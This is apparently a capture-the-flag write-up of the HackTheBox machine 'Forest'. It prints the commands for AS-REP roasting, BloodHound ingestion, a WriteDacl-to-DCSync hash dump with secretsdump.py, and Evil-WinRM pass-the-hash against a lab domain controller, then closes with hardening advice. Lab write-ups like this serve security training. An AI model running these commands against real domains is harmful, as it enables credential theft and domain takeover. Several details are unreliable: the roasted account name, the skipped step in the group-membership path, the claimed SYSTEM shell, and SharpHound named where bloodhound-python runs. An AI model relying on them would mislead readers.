HackTheBox
MEDIUM
•
12 min read
•
October 1, 2026
•
7 views
•
0 likes
Forest (HackTheBox): Active Directory Kerberoasting & BloodHound Privilege Escalation
#Active Directory
#BloodHound
#Kerberos
#AS-REP Roasting
#Pass-the-Hash
Executive Synopsis
Comprehensive intrusion walkthrough against a Windows Active Directory domain controller. Covers roasting pre-authentication disabled accounts (AS-REP Roasting), BloodHound shortest path ingestion, and Domain Admin takeover via WriteDacl abuse on Exchange Windows Permissions.
Executive Overview
Forest is a Windows Active Directory machine demonstrating severe misconfigurations in Kerberos pre-authentication policies and Active Directory Access Control Lists (ACLs). This writeup details the end-to-end compromise: from initial reconnaissance to Domain Admin takeover.
---
Phase 1: Port Reconnaissance & Service Fingerprinting
Initial full TCP port scan executed with Nmap revealed a standard enterprise Active Directory Domain Controller topology:
# Nmap Initial Reconnaissance Command
nmap -sC -sV -p- -oN nmap_forest.txt 10.10.10.161
**Identified Attack Surface:** - **Port 88 (Kerberos):** Active Directory Kerberos service - **Port 135 (RPC):** Windows Remote Procedure Call endpoint mapper - **Port 389 / 636 (LDAP/LDAPS):** Active Directory directory services - **Port 445 (SMB):** Microsoft-DS service - **Port 5985 (WinRM):** Windows Remote Management
---
Phase 2: AS-REP Roasting (No Pre-Authentication)
We utilized Impacket's
GetNPUsers.py against a harvest of potential domain user accounts to identify any principals without Do not require Kerberos preauthentication enforced.# AS-REP Roasting Enumeration
python3 GetNPUsers.py htb.local/ -usersfile users.txt -format hashcat -no-pass -dc-ip 10.10.10.161
Target user **sebastien** returned a valid Kerberos AS-REP hash (
$krb5asrep$23$...). We cracked this hash using Hashcat mode 18200 against rockyou.txt in under 3 minutes.---
Phase 3: BloodHound Ingestion & ACL Abuse Path
After obtaining valid credentials, we ingested the domain structure using SharpHound and visualized the attack path in BloodHound.
# Remote SharpHound Ingest via Python
bloodhound-python -u 'sebastien' -p 'cracked_pass' -d htb.local -ns 10.10.10.161 -c All
**Shortest Path to Domain Admin:** 1.
sebastien is a member of Service Accounts.
2. Service Accounts has generic membership in Exchange Windows Permissions.
3. Exchange Windows Permissions possesses WriteDacl rights over the root Domain Object (DC=htb,DC=local).---
Phase 4: DCSync Attack & Domain Dominance
By abusing the
WriteDacl privilege, we granted our user account DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain root, enabling a remote DCSync extraction of the Administrator NTLM hash:# DCSync Attack with Impacket
python3 secretsdump.py htb.local/sebastien:'cracked_pass'@10.10.10.161 -just-dc-user Administrator
With the Administrator NTLM hash in hand, we gained a high-integrity SYSTEM shell via WinRM using Evil-WinRM Pass-the-Hash.
---
Mitigation & Hardening Blueprint
1. **Enforce Pre-Authentication:** Audit all AD user accounts to ensureDONT_REQ_PREAUTH flag is unset.
2. **Review Delegated ACLs:** Restrict WriteDacl permissions on critical domain containers and adhere to Tiered Administration architecture.
Did this research assist your operations?
React with a like to endorse this technical walk-through and help fellow security researchers.
Authored By
Omar Adel Mahmoud
Penetration Tester & Security Researcher